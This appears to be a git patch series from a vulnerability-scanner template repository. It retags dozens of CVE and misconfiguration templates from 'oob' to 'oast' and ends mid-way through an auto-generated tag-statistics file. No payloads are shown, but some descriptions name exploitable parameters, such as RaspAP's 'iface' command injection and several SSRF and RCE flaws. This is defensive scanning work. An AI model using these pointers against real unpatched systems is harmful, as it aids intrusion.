tags: cve,cve2020,cacti,rce,oob + tags: cve,cve2020,cacti,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 229fe664bb..d7e5339d49 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -13,7 +13,7 @@ info: - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md - tags: cve,cve2021,cisco,rce,oob + tags: cve,cve2021,cisco,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-1498.yaml b/cves/2021/CVE-2021-1498.yaml index f10fa4fa4c..52551ed30c 100644 --- a/cves/2021/CVE-2021-1498.yaml +++ b/cves/2021/CVE-2021-1498.yaml @@ -13,7 +13,7 @@ info: - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md - tags: cve,cve2021,cisco,rce,oob + tags: cve,cve2021,cisco,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 0758519bac..0a31bb7afe 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -9,7 +9,7 @@ info: - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - tags: cve,cve2021,minio,ssrf,oob + tags: cve,cve2021,minio,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.70 diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index f1fcc89ba3..7560be89b8 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html - tags: cve,cve2021,gitlab,ssrf,oob + tags: cve,cve2021,gitlab,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.60 diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index 634ca3ad27..de4805ad65 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -6,7 +6,7 @@ info: description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a - tags: cve,cve2021,wordpress,lfi,ssrf,oob + tags: cve,cve2021,wordpress,lfi,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f2b5e87856..657ae33b97 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft + tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft reference: - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 66ef428473..016d7dfa7b 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: cve,cve2021,tenda,rce,oob + tags: cve,cve2021,tenda,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index c85b8eac3a..abf78bb0bb 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - tags: cve,cve2021,websvn,rce,oob + tags: cve,cve2021,websvn,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 455e65993d..46ba6e1c2d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -12,7 +12,7 @@ info: - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/ - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 - tags: cve,cve2021,nodejs,rce,oob + tags: cve,cve2021,nodejs,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 6a55383739..962a422282 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - https://github.com/RaspAP/raspap-webgui description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. - tags: cve,cve2021,rce,raspap,oob + tags: cve,cve2021,rce,raspap,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 6337242a45..07f4a2f151 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -7,7 +7,7 @@ info: severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - tags: cve,cve2021,geutebruck,rce,oob + tags: cve,cve2021,geutebruck,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.20 diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml index df563b47c3..17f750ee26 100644 --- a/cves/2021/CVE-2021-3577.yaml +++ b/cves/2021/CVE-2021-3577.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-3577 cwe-id: CWE-78 - tags: cve,cve2021,rce,oob,motorola,iot + tags: cve,cve2021,rce,oast,motorola,iot requests: - raw: diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index afdeff9e10..25a1785fc2 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -7,7 +7,7 @@ info: severity: critical reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ - tags: cve,cve2021,sureline,rce,oob + tags: cve,cve2021,sureline,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index 8c7d545c22..51d98bbad2 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml @@ -9,7 +9,7 @@ info: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - tags: cve,cve2021,ssrf,apache,mod-proxy,oob + tags: cve,cve2021,ssrf,apache,mod-proxy,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.00 diff --git a/iot/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml index 774cf2a690..994b19128d 100644 --- a/iot/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: high description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php - tags: targa,ssrf,oob,iot + tags: targa,ssrf,oast,iot requests: - raw: diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml index 8ab2ad1a4c..2674cd7f60 100644 --- a/misconfiguration/cloudflare-image-ssrf.yaml +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: info description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 - tags: cloudflare,misconfig,oob + tags: cloudflare,misconfig,oast requests: - raw: diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml index 2eff47e123..5daa74204e 100644 --- a/misconfiguration/linkerd-ssrf-detect.yaml +++ b/misconfiguration/linkerd-ssrf-detect.yaml @@ -4,7 +4,7 @@ info: name: Linkerd SSRF detection author: dudez severity: high - tags: ssrf,linkerd,oob + tags: ssrf,linkerd,oast reference: https://twitter.com/nirvana_msu/status/1084144955034165248 requests: diff --git a/misconfiguration/ssrf-via-oauth-misconfig.yaml b/misconfiguration/ssrf-via-oauth-misconfig.yaml index c4c61ac7c2..d9b4e75556 100644 --- a/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -5,7 +5,7 @@ info: author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - tags: misconfig,oob,oauth + tags: misconfig,oast,oauth reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: diff --git a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml index 780055a6d9..ea4569fc8a 100644 --- a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml +++ b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml @@ -8,7 +8,7 @@ info: reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - tags: confluence,atlassian,ssrf,jira,oob + tags: confluence,atlassian,ssrf,jira,oast requests: - method: GET diff --git a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml index 864e73e8dd..b914c4b0e3 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml @@ -8,7 +8,7 @@ info: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce - https://www.freebuf.com/vuls/208339.html - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml index d0e75c825e..84843c7c35 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml index 9fb159c5ff..a6146589d3 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml index ea9499ce58..98c915edeb 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml index e8428e5e15..1c8990b146 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml @@ -9,7 +9,7 @@ info: - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml index 8afbf260fd..236712a7b8 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml index 28f6c5d5cd..326f2fb9ff 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml index 49ef2c1de0..64d91e3be9 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oob + tags: fastjson,rce,deserialization,oast requests: - raw: diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml index b4404a4f0c..332914d8d0 100644 --- a/vulnerabilities/generic/oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed URL from the request headers. reference: https://github.com/PortSwigger/collaborator-everywhere - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - method: GET diff --git a/vulnerabilities/generic/oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml index 3c3dbce5db..69955c6ee2 100644 --- a/vulnerabilities/generic/oob-param-based-interaction.yaml +++ b/vulnerabilities/generic/oob-param-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed URL from the request parameters. reference: https://github.com/PortSwigger/collaborator-everywhere - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - method: GET diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index e532b15dde..dfa1de5d96 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -6,7 +6,7 @@ info: severity: info description: The remote server fetched a spoofed DNS Name from the request. reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface - tags: oob,ssrf,generic + tags: oast,ssrf,generic requests: - raw: diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index fc90bf1e5d..47a2da9817 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob,intrusive + tags: hashicorp,rce,oast,intrusive requests: - raw: diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 88176d592c..f0aa5c374c 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -7,7 +7,7 @@ info: description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. reference: - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: mirai,rce,oob + tags: mirai,rce,oast requests: - raw: diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index 9b4442dcd8..3fb5459ca4 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -7,7 +7,7 @@ info: description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - tags: netgear,rce,oob,router + tags: netgear,rce,oast,router requests: - raw: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index f79ef39c18..7b87b1527b 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: optiLink,rce,oob + tags: optiLink,rce,oast requests: - raw: diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 902279b7f8..24a127592a 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -6,7 +6,7 @@ info: severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: https://www.exploit-db.com/exploits/49344 - tags: sar2html,rce,oob + tags: sar2html,rce,oast requests: - raw: diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml index b2c31e9384..8b0edcd260 100644 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -7,7 +7,7 @@ info: description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://www.exploit-db.com/exploits/50098 - tags: visualtools,rce,oob + tags: visualtools,rce,oast requests: - raw: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index f8e73a2cf6..d1deffe075 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: - https://www.adminxe.com/2183.html - tags: zimbra,ssrf,oob + tags: zimbra,ssrf,oast requests: - raw: diff --git a/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml index da1277e0fb..c81a051e5d 100644 --- a/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -4,7 +4,7 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oob + tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 From ecf4ed15f70c87ac34246b97c627020d1d7778ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:41:11 +0000 Subject: [PATCH 36/54] Auto Generated Templates Stats [Mon Oct 18 20:41:11 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1788 +++++++++++++++++++++--------------------- TOP-10.md | 10 +- 3 files changed, 900 insertions(+), 900 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 3b3ab8672e..d6eb666918 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":832},{"name":"lfi","count":342},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":240},{"name":"rce","count":214},{"name":"tech","count":197},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":92},{"name":"apache","count":73},{"name":"iot","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"router","count":22},{"name":"misconfig","count":22},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"aws","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"rails","count":8},{"name":"nginx","count":8},{"name":"ibm","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"microsoft","count":8},{"name":"cnvd","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"solr","count":6},{"name":"phpmyadmin","count":6},{"name":"lucee","count":6},{"name":"docker","count":6},{"name":"fileupload","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"jetty","count":6},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"ssti","count":5},{"name":"iis","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"thinkcmf","count":4},{"name":"samsung","count":4},{"name":"firmware","count":4},{"name":"npm","count":4},{"name":"zimbra","count":4},{"name":"resin","count":4},{"name":"magmi","count":4},{"name":"artifactory","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"slack","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"asp","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"rfi","count":4},{"name":"fatpipe","count":4},{"name":"symantec","count":4},{"name":"wso2","count":4},{"name":"zabbix","count":4},{"name":"buffalo","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"strapi","count":4},{"name":"amazon","count":4},{"name":"proxy","count":4},{"name":"ssh","count":3},{"name":"httpd","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"injection","count":3},{"name":"cloud","count":3},{"name":"bigip","count":3},{"name":"nexus","count":3},{"name":"kibana","count":3},{"name":"smtp","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"itop","count":3},{"name":"springcloud","count":3},{"name":"telerik","count":3},{"name":"jeesns","count":3},{"name":"search","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"bitrix","count":3},{"name":"node","count":3},{"name":"exposures","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"sonicwall","count":3},{"name":"mongodb","count":3},{"name":"kevinlab","count":3},{"name":"cves","count":3},{"name":"openam","count":3},{"name":"ofbiz","count":3},{"name":"cve2007","count":3},{"name":"targa","count":3},{"name":"azure","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"mail","count":3},{"name":"caucho","count":3},{"name":"vbulletin","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"cacti","count":3},{"name":"lfr","count":3},{"name":"druid","count":3},{"name":"opensis","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"github","count":3},{"name":"prometheus","count":3},{"name":"hoteldruid","count":3},{"name":"nosqli","count":3},{"name":"backdoor","count":3},{"name":"tikiwiki","count":3},{"name":"igs","count":2},{"name":"wuzhicms","count":2},{"name":